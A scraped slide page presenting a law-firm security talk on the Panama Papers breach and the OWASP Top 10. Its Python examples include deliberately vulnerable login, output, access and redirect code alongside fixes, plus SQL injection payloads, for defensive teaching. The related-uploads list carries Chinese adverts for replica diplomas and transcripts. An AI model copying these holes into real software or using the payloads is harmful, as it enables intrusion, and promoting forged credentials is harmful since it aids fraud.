办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样
9ib5wiwt
 
XYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdf
XYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdfXYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdf
XYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdf
bhavenpr
 
How to Obtain Permanent Residency in the Netherlands
How to Obtain Permanent Residency in the NetherlandsHow to Obtain Permanent Residency in the Netherlands
How to Obtain Permanent Residency in the Netherlands
BridgeWest.eu
 
原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样
原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样
原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样
9ib5wiwt
 
Rokita Releases Soccer Stadium Legal Opinion
Rokita Releases Soccer Stadium Legal OpinionRokita Releases Soccer Stadium Legal Opinion
Rokita Releases Soccer Stadium Legal Opinion
Abdul-Hakim Shabazz
 
Ease of Paying Tax Law Republic Act 11976
Ease of Paying Tax Law Republic Act 11976Ease of Paying Tax Law Republic Act 11976
Ease of Paying Tax Law Republic Act 11976
PelayoGilbert
 
ADR in criminal proceeding in Bangladesh with global perspective.
ADR in criminal proceeding in Bangladesh with global perspective.ADR in criminal proceeding in Bangladesh with global perspective.
ADR in criminal proceeding in Bangladesh with global perspective.
Daffodil International University
 
Highlights_of_Bhartiya_Nyaya_Sanhita.pptx
Highlights_of_Bhartiya_Nyaya_Sanhita.pptxHighlights_of_Bhartiya_Nyaya_Sanhita.pptx
Highlights_of_Bhartiya_Nyaya_Sanhita.pptx
anjalidixit21
 
Secure Your Brand: File a Trademark Today
Secure Your Brand: File a Trademark TodaySecure Your Brand: File a Trademark Today
Secure Your Brand: File a Trademark Today
Trademark Quick
 
Car Accident Injury Do I Have a Case....
Car Accident Injury Do I Have a Case....Car Accident Injury Do I Have a Case....
Car Accident Injury Do I Have a Case....
Knowyourright
 
new victimology of indonesian law. Pptx.
new victimology of indonesian law. Pptx.new victimology of indonesian law. Pptx.
new victimology of indonesian law. Pptx.
niputusriwidiasih
 
Military Commissions details LtCol Thomas Jasper as Detailed Defense Counsel
Military Commissions details LtCol Thomas Jasper as Detailed Defense CounselMilitary Commissions details LtCol Thomas Jasper as Detailed Defense Counsel
Military Commissions details LtCol Thomas Jasper as Detailed Defense Counsel
Thomas (Tom) Jasper
 
1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样
1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样
1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样
9ib5wiwt
 
Debt Mapping Camp bebas riba to know how much our debt
Debt Mapping Camp bebas riba to know how much our debtDebt Mapping Camp bebas riba to know how much our debt
Debt Mapping Camp bebas riba to know how much our debt
ssuser0576e4
 
The Reserve Bank of India Act, 1934.pptx
The Reserve Bank of India Act, 1934.pptxThe Reserve Bank of India Act, 1934.pptx
The Reserve Bank of India Act, 1934.pptx
nehatalele22st
 
一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理
一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理
一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理
o6ov5dqmf
 
Daftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdf
Daftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdfDaftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdf
Daftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdf
akbarrasyid3
 
Roles of a Bankruptcy Lawyer John Cavitt
Roles of a Bankruptcy Lawyer John CavittRoles of a Bankruptcy Lawyer John Cavitt
Roles of a Bankruptcy Lawyer John Cavitt
johncavitthouston
 
The Main Procedures for Obtaining Cypriot Citizenship
The Main Procedures for Obtaining Cypriot CitizenshipThe Main Procedures for Obtaining Cypriot Citizenship
The Main Procedures for Obtaining Cypriot Citizenship
BridgeWest.eu
 
Responsibilities of the office bearers while registering multi-state cooperat...
Responsibilities of the office bearers while registering multi-state cooperat...Responsibilities of the office bearers while registering multi-state cooperat...
Responsibilities of the office bearers while registering multi-state cooperat...
Finlaw Consultancy Pvt Ltd
 

Recently uploaded (20)

办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样
办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样
办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样
 
XYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdf
XYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdfXYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdf
XYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdf
 
How to Obtain Permanent Residency in the Netherlands
How to Obtain Permanent Residency in the NetherlandsHow to Obtain Permanent Residency in the Netherlands
How to Obtain Permanent Residency in the Netherlands
 
原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样
原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样
原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样
 
Rokita Releases Soccer Stadium Legal Opinion
Rokita Releases Soccer Stadium Legal OpinionRokita Releases Soccer Stadium Legal Opinion
Rokita Releases Soccer Stadium Legal Opinion
 
Ease of Paying Tax Law Republic Act 11976
Ease of Paying Tax Law Republic Act 11976Ease of Paying Tax Law Republic Act 11976
Ease of Paying Tax Law Republic Act 11976
 
ADR in criminal proceeding in Bangladesh with global perspective.
ADR in criminal proceeding in Bangladesh with global perspective.ADR in criminal proceeding in Bangladesh with global perspective.
ADR in criminal proceeding in Bangladesh with global perspective.
 
Highlights_of_Bhartiya_Nyaya_Sanhita.pptx
Highlights_of_Bhartiya_Nyaya_Sanhita.pptxHighlights_of_Bhartiya_Nyaya_Sanhita.pptx
Highlights_of_Bhartiya_Nyaya_Sanhita.pptx
 
Secure Your Brand: File a Trademark Today
Secure Your Brand: File a Trademark TodaySecure Your Brand: File a Trademark Today
Secure Your Brand: File a Trademark Today
 
Car Accident Injury Do I Have a Case....
Car Accident Injury Do I Have a Case....Car Accident Injury Do I Have a Case....
Car Accident Injury Do I Have a Case....
 
new victimology of indonesian law. Pptx.
new victimology of indonesian law. Pptx.new victimology of indonesian law. Pptx.
new victimology of indonesian law. Pptx.
 
Military Commissions details LtCol Thomas Jasper as Detailed Defense Counsel
Military Commissions details LtCol Thomas Jasper as Detailed Defense CounselMilitary Commissions details LtCol Thomas Jasper as Detailed Defense Counsel
Military Commissions details LtCol Thomas Jasper as Detailed Defense Counsel
 
1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样
1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样
1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样
 
Debt Mapping Camp bebas riba to know how much our debt
Debt Mapping Camp bebas riba to know how much our debtDebt Mapping Camp bebas riba to know how much our debt
Debt Mapping Camp bebas riba to know how much our debt
 
The Reserve Bank of India Act, 1934.pptx
The Reserve Bank of India Act, 1934.pptxThe Reserve Bank of India Act, 1934.pptx
The Reserve Bank of India Act, 1934.pptx
 
一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理
一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理
一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理
 
Daftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdf
Daftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdfDaftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdf
Daftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdf
 
Roles of a Bankruptcy Lawyer John Cavitt
Roles of a Bankruptcy Lawyer John CavittRoles of a Bankruptcy Lawyer John Cavitt
Roles of a Bankruptcy Lawyer John Cavitt
 
The Main Procedures for Obtaining Cypriot Citizenship
The Main Procedures for Obtaining Cypriot CitizenshipThe Main Procedures for Obtaining Cypriot Citizenship
The Main Procedures for Obtaining Cypriot Citizenship
 
Responsibilities of the office bearers while registering multi-state cooperat...
Responsibilities of the office bearers while registering multi-state cooperat...Responsibilities of the office bearers while registering multi-state cooperat...
Responsibilities of the office bearers while registering multi-state cooperat...
 

Panama Papers Leak and Precautions Law firms should take

  • 1. An exposé by lawyers! What to learn from the Panama Papers leak. Adv. Prashant Mali. Advocate Prashant Mali (www.prashantmali.com)
  • 2. The Background • The data breach at Mossack Fonseca, a Panamanian law firm, is being touted as the largest ever in terms of the sheer volume of information leaked. • The leaked information allegedly details the ways dozens of high-ranking politicians, their relatives or close associates in more than 50 countries, including the U.K., France, Russia, China and India, have used offshore companies to hide income and avoid paying taxes.
  • 3. The Numbers • The leak reportedly covers 11.5 million confidential documents dating from the 1970s to late 2015. • The 2.6 terabytes of leaked data include: 4.8 million emails; 3 million database files; 2.2 million PDFs; 1.1 million images; 320,000 text documents.
  • 4. How did the Leak happen? • The leak is reported to stem from a compromise of the firm's email system. • An attack on an email server could have happened in multiple ways. • The firm's client portal was found to be vulnerable to DROWN (CVE-2016-0800) because its servers still supported the old, deprecated SSLv2 protocol; DROWN lets an attacker who can record TLS traffic to such a server decrypt it.
  • 5. How did the Leak happen? • The portal ran the open source Drupal content management system (CMS) in a version that had not been updated for two years. • That outdated Drupal version was vulnerable to SQL injection (the slide cites a figure of 97% of data breaches worldwide being attributable to injection). • Other application-layer weaknesses reported on the portal were Cross-Site Scripting, Cross-Site Request Forgery and a login that could be brute-forced.
  • 6. How did the Leak happen? • Security researchers have claimed that certain back-end portions of the site were also reachable with simple, guessable requests. • The firm's Microsoft Outlook installation had last been updated in 2009, seven years earlier. • Emails were not encrypted, and with application and system security at that standard it was straightforward for the attackers to reach administrator-level privileges.
  • 7. 1. Injection • Injection happens when an application builds a database query or system command by pasting user input into it without validation or parameterisation, so that the input is interpreted as part of the command rather than as data. • Any input that reaches the server can carry the payload: login forms, search boxes, comment fields, URL parameters. • Business risk: the attacker gets a direct way of interacting with the database or server. • They can read data, change it, delete it, deny access to it and much more. • Injection attacks such as SQL injection have been alleged to be behind major data breaches, including those at Ashley Madison and Sony.
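As an added example (not code from the presentation or from any real portal), the login query below is written twice: once by pasting the input into the SQL text, once parameterised. The in-memory SQLite table, the user names and the "hash" strings are constructed for the example; the two payloads are the classic comment-out and tautology forms.

```python
import sqlite3
from typing import Optional, Tuple

# Constructed sample data standing in for a client-portal user table
# (assumption: the real portal's schema is not known; this is illustrative only).
SAMPLE_USERS = [
    ("alice", "hash-of-alice-password", "partner"),
    ("bob", "hash-of-bob-password", "associate"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database holding the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        SAMPLE_USERS,
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str,
                     password_hash: str) -> Optional[Tuple[str, str]]:
    """Deliberately vulnerable: user input is pasted into the SQL text, so the
    input becomes part of the query's grammar."""
    sql = ("SELECT username, role FROM users WHERE username = '%s' "
           "AND password_hash = '%s'" % (username, password_hash))
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str,
               password_hash: str) -> Optional[Tuple[str, str]]:
    """Parameterised query: the driver sends the values separately from the SQL
    text, so a quote or comment marker in the input is just data."""
    sql = ("SELECT username, role FROM users WHERE username = ? "
           "AND password_hash = ?")
    return conn.execute(sql, (username, password_hash)).fetchone()


def demo() -> dict:
    """Run the same two payloads through both implementations."""
    conn = make_db()
    # Payload 1: close the string literal, then comment out the password check.
    bypass = "alice' --"
    # Payload 2: tautology, makes the WHERE clause true for every row.
    tautology = "' OR '1'='1"
    return {
        "vuln_bypass": login_vulnerable(conn, bypass, "wrong"),
        "safe_bypass": login_safe(conn, bypass, "wrong"),
        "vuln_tautology": login_vulnerable(conn, tautology, "x' OR '1'='1"),
        "safe_tautology": login_safe(conn, tautology, "x' OR '1'='1"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print("%-15s -> %r" % (name, row))
```

With the vulnerable function both payloads log the attacker in as the first matching user without a password; with the parameterised function both return no row. Parameterisation is the fix; input filtering on the login page is at best a second layer.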
  • 8. 2. Broken Authentication & Session Management • Weaknesses in how accounts, password recovery and sessions are handled (predictable session identifiers, sessions that never expire, tokens exposed in URLs, weak recovery questions) let an attacker take over an account without knowing the password. • Tight control over log-in is essential: unique user IDs, strong passwords, and session tokens that are random, expire, and are replaced after login. • Business risk: attackers gain complete access to the account. • In severe cases, stolen database records are sold on underground black markets.
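The session-handling rules above, as an added example that is not part of the presentation: a server-side session store with unguessable tokens, idle and absolute expiry, token rotation, and a cookie flagged so script and plain HTTP cannot read it. The time limits and the cookie name are assumptions chosen for the example; the clock is injectable so the expiry logic can be exercised without waiting.

```python
import secrets
import time
from typing import Callable, Dict, Optional

# Assumed policy values for the example (not from the presentation).
IDLE_TTL_SECONDS = 15 * 60          # log out after 15 minutes of inactivity
ABSOLUTE_TTL_SECONDS = 8 * 60 * 60  # and after 8 hours regardless of activity


class SessionStore:
    """Server-side session store with random tokens, idle and absolute expiry,
    and rotation of the token after login or privilege change."""

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._sessions: Dict[str, dict] = {}
        self._clock = clock  # injectable for testing

    def create(self, user: str) -> str:
        # 32 random bytes (~256 bits): not guessable, unlike sequential IDs.
        token = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[token] = {"user": user, "created": now, "last_seen": now}
        return token

    def resolve(self, token: Optional[str]) -> Optional[str]:
        """Return the user for a token, or None if unknown or expired."""
        if token is None:
            return None
        session = self._sessions.get(token)
        if session is None:
            return None
        now = self._clock()
        if (now - session["created"] > ABSOLUTE_TTL_SECONDS
                or now - session["last_seen"] > IDLE_TTL_SECONDS):
            del self._sessions[token]
            return None
        session["last_seen"] = now
        return session["user"]

    def rotate(self, token: str) -> Optional[str]:
        """Issue a fresh token and invalidate the old one (session-fixation defence)."""
        user = self.resolve(token)
        if user is None:
            return None
        del self._sessions[token]
        return self.create(user)

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)


def session_cookie(token: str) -> str:
    """Set-Cookie value: not readable by script, HTTPS only, not sent on
    cross-site navigations."""
    return "session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % token


def login(store: SessionStore, pre_login_token: Optional[str], user: str) -> str:
    """On successful authentication, never keep the pre-login token: an attacker
    who planted it (session fixation) would otherwise inherit the session."""
    if pre_login_token is not None:
        store.logout(pre_login_token)
    return store.create(user)
```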
  • 9. 3. Cross-site Scripting (XSS) • One of the most common web vulnerabilities: the application places attacker-supplied input in a page without encoding it, so the victim's browser runs the attacker's script with the site's own origin. • It threatens both users and the website. • The attacker does not intercept the connection between server and browser; the malicious script is delivered through the site itself (reflected from a crafted link, stored in a comment or profile, or injected by client-side code) and executes in the user's session. • XSS can steal session cookies, perform actions as the user, deface pages and redirect users to any other URL. • Business risk: attackers can change the home page of the website or inject malware on the site. • It usually leads to the website being blocked by search engines and browsers.
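An added example of the output-encoding fix (not from the presentation): a search page that reflects the query, rendered once unencoded and once with context-appropriate HTML escaping, plus the response headers that limit the damage if an encoding is missed somewhere. The page fragments and the Content-Security-Policy value are assumptions for the example.

```python
import html
from typing import Dict


def render_results_vulnerable(query: str) -> str:
    """Reflects the search term verbatim: whatever the user (or a link the
    user clicked) supplied is parsed by the browser as HTML."""
    return "<p>Results for: %s</p>" % query


def render_results_safe(query: str) -> str:
    """HTML-body context: encode <, >, &, and quotes so the term is shown as text."""
    return "<p>Results for: %s</p>" % html.escape(query, quote=True)


def render_search_box_safe(query: str) -> str:
    """Attribute context: quotes must be encoded too, or the payload can close
    the attribute value and add an event handler."""
    return '<input type="text" name="q" value="%s">' % html.escape(query, quote=True)


def security_headers() -> Dict[str, str]:
    """Defence in depth: a CSP without 'unsafe-inline' stops injected inline
    script even if encoding is missed; nosniff stops uploads being run as script."""
    return {
        "Content-Security-Policy": ("default-src 'self'; script-src 'self'; "
                                    "object-src 'none'; base-uri 'self'"),
        "X-Content-Type-Options": "nosniff",
    }


def contains_live_tag(markup: str, tag: str = "script") -> bool:
    """Crude check used to demonstrate the difference: is an unencoded opening
    tag still present? (Not a sanitiser; encoding on output is the fix.)"""
    return ("<%s" % tag) in markup.lower()
```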
  • 10. 4. Insecure Direct Object References • This vulnerability appears when an application exposes an internal identifier (a record number in a URL or form field) and does not check that the requesting user is authorised to see that record; changing a few digits and pressing enter returns someone else's data because the identifiers are predictable. • Multiple predictable patterns let attackers walk through the database and pull restricted data. • Business risk: an attacker can access and expose a lot of data. • Even where the attacker can only read, confidentiality is gone; if the same endpoint also accepts updates, records can be altered or deleted too.
  • 11. 5. Security Misconfiguration • Misconfiguration is hard to handle because it covers security lapses at every level of the stack: server, framework, application and database. • Many system administrators leave default passwords in place, never rotate their own, and do not disable ports, services and accounts that are no longer used. • Attackers look for such small lapses, combine them, and chain them into something big. • Business risk: can lead to complete loss of data through alteration, deletion and theft. • Attackers use one weakness after another to reach the database.
  • 12. 6. Sensitive Data Exposure • Sensitive data should be encrypted in transit and at rest with current, well-reviewed cryptographic algorithms; passwords are the exception and should not be encrypted at all but stored as salted, deliberately slow hashes, so they cannot be recovered even by someone who holds the key. • Done properly, stolen password hashes or encrypted card numbers are of little use to the thief. • Keys must be managed so that only authorised systems can decrypt. • Business risk: loss of sensitive data, passwords, credit card information, addresses and bank statements. • May have serious repercussions on credibility.
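The password-storage point above, as an added example that is not part of the presentation: PBKDF2-HMAC-SHA256 with a per-user random salt, a self-describing record format, constant-time verification, and an upgrade path when the cost parameter is raised. The iteration count and the record format are assumptions for the example.

```python
import base64
import hashlib
import hmac
import os

# Assumed cost parameter for the example; raise it as hardware gets faster.
PBKDF2_ITERATIONS = 600_000
HASH_NAME = "pbkdf2_sha256"


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, slow, one-way: the stored string cannot be turned back into the
    password, a guarantee that encryption (reversible with the key) cannot give."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join([
        HASH_NAME,
        str(iterations),
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    ])


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and cost, then compare in constant time."""
    try:
        name, iterations, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False
    if name != HASH_NAME:
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                                    int(iterations), len(expected))
    return hmac.compare_digest(candidate, expected)


def needs_rehash(stored: str, iterations: int = PBKDF2_ITERATIONS) -> bool:
    """True when the record was made with a lower cost than current policy."""
    parts = stored.split("$")
    return len(parts) != 4 or parts[0] != HASH_NAME or int(parts[1]) < iterations


def login_and_upgrade(password: str, stored: str):
    """Returns (ok, new_record). The plaintext is only available at login, so
    that is the moment to re-hash records made under an older, weaker policy."""
    if not verify_password(password, stored):
        return False, None
    if needs_rehash(stored):
        return True, hash_password(password)
    return True, None
```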
  • 13. 7. Missing Function Level Access Control • Administrative functions are the most important ones to restrict, and every privileged function must check the caller's role on the server side, not merely hide the menu entry in the user interface. • Many organisations never verify that only authorised accounts can reach privileged functions and information. • Business risk: once the attacker reaches admin functionality, he can change application data and settings. • Serious tangible and intangible consequences, and loss of credibility.
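Slides 10 and 13 describe the two halves of authorisation: object-level (is this record yours?) and function-level (may your role call this at all?). As an added example that is not code from the presentation, the portal data below is constructed: two clients who each own one matter, one administrator, a deliberately unchecked accessor, the checked accessor, and a role decorator on an administrative function.

```python
from dataclasses import dataclass
from typing import Dict, List, Set


class Forbidden(Exception):
    """Raised when the caller is not allowed to perform the action."""


@dataclass(frozen=True)
class Matter:
    matter_id: int
    client_id: int
    summary: str


# Constructed sample data (assumption: each client may see only its own
# matters, and only the admin role manages accounts).
MATTERS: Dict[int, Matter] = {
    1001: Matter(1001, client_id=1, summary="Holding structure, client 1"),
    1002: Matter(1002, client_id=2, summary="Trust deed review, client 2"),
}
USERS: Dict[str, dict] = {
    "client1": {"role": "client", "client_ids": {1}},
    "client2": {"role": "client", "client_ids": {2}},
    "sysadmin": {"role": "admin", "client_ids": set()},
}


def get_matter_vulnerable(matter_id: int) -> Matter:
    """IDOR: the record goes to anyone who knows (or guesses) the number."""
    return MATTERS[matter_id]


def get_matter(user: str, matter_id: int) -> Matter:
    """Object-level check: the caller must be entitled to this record."""
    matter = MATTERS.get(matter_id)
    allowed: Set[int] = USERS[user]["client_ids"]
    if matter is None or matter.client_id not in allowed:
        # Same error for "missing" and "not yours", so IDs cannot be enumerated.
        raise Forbidden("matter not available to %s" % user)
    return matter


def require_role(*roles: str):
    """Function-level check, enforced on the server for every call, whether or
    not the UI showed the button."""
    def decorator(fn):
        def wrapper(user: str, *args, **kwargs):
            if USERS.get(user, {}).get("role") not in roles:
                raise Forbidden("%s may not call %s" % (user, fn.__name__))
            return fn(user, *args, **kwargs)
        wrapper.__name__ = fn.__name__
        return wrapper
    return decorator


@require_role("admin")
def disable_account(user: str, target: str) -> str:
    """Administrative function: reachable only by the admin role."""
    if target not in USERS:
        raise KeyError(target)
    USERS[target]["disabled"] = True
    return "%s disabled by %s" % (target, user)


def enumerate_like_attacker(user: str) -> List[int]:
    """Walk a range of predictable IDs as an attacker would; with the checked
    accessor only the caller's own matters come back."""
    found = []
    for matter_id in range(1000, 1010):
        try:
            found.append(get_matter(user, matter_id).matter_id)
        except Forbidden:
            pass
    return found
```

Unguessable identifiers (random UUIDs instead of sequential numbers) slow enumeration down but are not a substitute for the ownership check; the check is what closes the hole.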
  • 14. 8. Cross-Site Request Forgery (CSRF) • The attacker plants a request to the target site in a page the customer visits (an image tag, a hidden auto-submitting form); because the browser attaches the customer's session cookie automatically, the site processes the request as if the customer had made it. • The customer never sees the forged request and does not know the command was sent. • Business risk: fraudulent requests, purchases and money transfers that look genuine in the logs. • One can never be sure which requests were real, and customers gradually lose trust in the website.
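An added example of the standard defence (not from the presentation): a per-session synchroniser token that the genuine form carries and an attacker's page cannot read, checked in constant time on every state-changing request, with GET refused for such requests and the Origin header as an independent second check. The endpoint, the request dictionary and the portal origin are assumptions for the example.

```python
import hmac
import secrets
from typing import Dict, Optional

OWN_ORIGIN = "https://portal.example-firm.test"  # assumed for the example


class CsrfTokens:
    """Synchroniser-token pattern: one secret per session, embedded in every
    form, required on every state-changing request."""

    def __init__(self) -> None:
        self._by_session: Dict[str, str] = {}

    def token_for(self, session_id: str) -> str:
        token = self._by_session.get(session_id)
        if token is None:
            token = secrets.token_urlsafe(32)
            self._by_session[session_id] = token
        return token

    def is_valid(self, session_id: Optional[str], submitted: Optional[str]) -> bool:
        expected = self._by_session.get(session_id) if session_id else None
        if expected is None or submitted is None:
            return False
        return hmac.compare_digest(expected, submitted)


def handle_transfer(csrf: CsrfTokens, request: dict) -> int:
    """Minimal handler for a money-transfer endpoint. `request` is a constructed
    dict: method, session_id (what the cookie carried), form fields, and the
    Origin header if the browser sent one. Returns an HTTP status code."""
    if request.get("method") != "POST":
        return 405  # never change state on GET: an <img src=...> is a GET
    token = request.get("form", {}).get("csrf_token")
    if not csrf.is_valid(request.get("session_id"), token):
        return 403
    origin = request.get("origin")
    if origin is not None and origin != OWN_ORIGIN:
        return 403  # independent check: browsers set Origin on cross-site POSTs
    return 200


def transfer_form_html(csrf: CsrfTokens, session_id: str) -> str:
    """The legitimate page includes the token; a page on another origin cannot
    read it, so it cannot build a request that passes the check."""
    return ('<form method="post" action="/transfer">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<input name="to"><input name="amount"><button>Send</button></form>'
            % csrf.token_for(session_id))
```

Marking the session cookie SameSite=Lax (as in the session example) is a third layer: the browser then omits the cookie on cross-site POSTs altogether.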
  • 15. 9. Using Components with Known Vulnerabilities • Applications are built on third-party and open source components (frameworks, CMS modules, libraries); when those are outdated or unreviewed, the application inherits their published vulnerabilities, exactly as the portal's two-year-old Drupal did. • Business risk: unknown code brings unknown risks. • Cross-site scripting, injection and business-logic flaws in components are just some examples. • Such vulnerabilities bring data breach, access control, defacement and theft risks.
  • 16. 10. Unvalidated Redirects and Forwards • The application sends users to a destination taken from a request parameter without checking it, so a link that starts at the genuine site lands the customer on a look-alike site run by fraudsters, who then collect the information they need. • Most websites do not even know about such unauthorised redirects that look genuine. • Customers should be careful about phishing, but a customer cannot reliably tell that a redirect went to the wrong site. The onus is on the website owner. • Business risk: attackers can install malware or access user accounts through phishing. • Customers lose trust in the attacked website.
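The redirect check a login page needs, as an added example that is not part of the presentation. The allowed host name and the landing path are assumptions; the function goes a little beyond the slide by also rejecting the protocol-relative (`//host`), backslash, `user@host` and `javascript:` forms that commonly slip past a naive "starts with a slash" test.

```python
from urllib.parse import urlparse

# Assumed for the example: the portal's own host; anything else is foreign.
ALLOWED_HOSTS = {"portal.example-firm.test"}
DEFAULT_LANDING = "/dashboard"


def redirect_target_vulnerable(next_param: str) -> str:
    """Trusts the parameter: /login?next=https://evil.test sends the user, after
    a genuine login, straight to the attacker's look-alike page."""
    return next_param or DEFAULT_LANDING


def redirect_target(next_param: str) -> str:
    """Only same-site relative paths or https URLs to an allowed host survive;
    everything else falls back to a fixed landing page."""
    if not next_param:
        return DEFAULT_LANDING
    candidate = next_param.strip()
    try:
        parsed = urlparse(candidate)
    except ValueError:          # e.g. malformed IPv6 literal
        return DEFAULT_LANDING

    if parsed.scheme or parsed.netloc:
        # Absolute (or protocol-relative //host) URL: must be https, an allowed
        # host, and carry no user@ prefix that could disguise the real host.
        host = (parsed.hostname or "").lower()
        if (parsed.scheme != "https" or host not in ALLOWED_HOSTS
                or parsed.username is not None):
            return DEFAULT_LANDING
        return candidate

    # Relative path: a single leading slash only. "//" is protocol-relative and
    # "/\" is read as "//" by some browsers; both would leave the site.
    if (not candidate.startswith("/") or candidate.startswith("//")
            or candidate.startswith("/\\")):
        return DEFAULT_LANDING
    return candidate
```

Where the set of legitimate destinations is small, mapping a short key (`next=matters`) to a server-side table is simpler still and leaves nothing to parse.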
  • 17. Solutions for such Attacks • A complete web application security solution is needed: one that detects, protects against and monitors for such attacks. • Total Application Security (TAS) is presented as an integrated web application security and compliance product. • It is described as detecting application-layer vulnerabilities, patching them without code changes, and continuously monitoring for emerging threats and DDoS attacks. • TAS does this with web application scanning (detect), virtual patching through a web application firewall (protect), and continuous traffic monitoring for emerging threats and DDoS attacks (monitor). • It also includes 24x7 managed service support to perform pen testing, create custom rules and, the vendor claims, maintain zero false positives.
  • 18. Ensure Data Security at your Law firm • Until recently, the only entities that seemed concerned with data security were large corporations and health care organisations. • With reports of security breaches making headline news weekly, data security has become top-of-mind for every business and for every person who carries and uses a credit card. • The threat of a data breach is a risk for law firms, too. • The threat alone is reason enough to enact more stringent security policies, but there is another compelling reason: the security requirements of your own clients. • Small law firms might think they are not a target, but even they hold clients' desirable data, and a small firm may be a much easier target than a corporate entity. • It is a problem law firms cannot ignore, whatever their size.
  • 19. What can law firms of any size do to better manage cyber security?
  • 20. Control Chaos • Changes to security should be implemented in a way that does not impede attorneys' ability to perform work for clients. • Your firm should balance the need to protect client data against the need to access it. • Consider the remediation steps for preventing CryptoLocker ransomware. You can lock down the firm's firewalls, desktops and email, but done too aggressively the changes have side effects: users cannot upload to court websites; one-off applications, such as those common in litigation, fail; email-scanning false positives cause missed email. • With planning, training, proper advance notice and staggering the change across users, the side effects can be minimised.
  • 21. Prepare, Plan and Train • Disruptions to productivity can be avoided through careful technology selection, planning and preparation. • Maintaining a current firewall is no longer enough protection on its own; select the security systems that give the best mix of ease of use and security. • Implement new systems and procedures only after they have been vetted and tested by a small group of users. • Prepare users with advance notice and a training plan that covers the topics in language they understand. • Security awareness training is designed to raise end users' awareness of the firm's security policies and of the threats to the firm, and to increase their willingness to follow the firm's security requirements. • It is probably the single most important step in preventing incidents such as the CryptoLocker ransomware that has infected numerous law firms in recent months.
  • 22. You should plan to cover • Electronic communications • Incident reporting • Internet access • Mobile device security • Password policies • Remote access • Social media use • The firm's Acceptable Use Policy • Visitor policies • Wireless access security
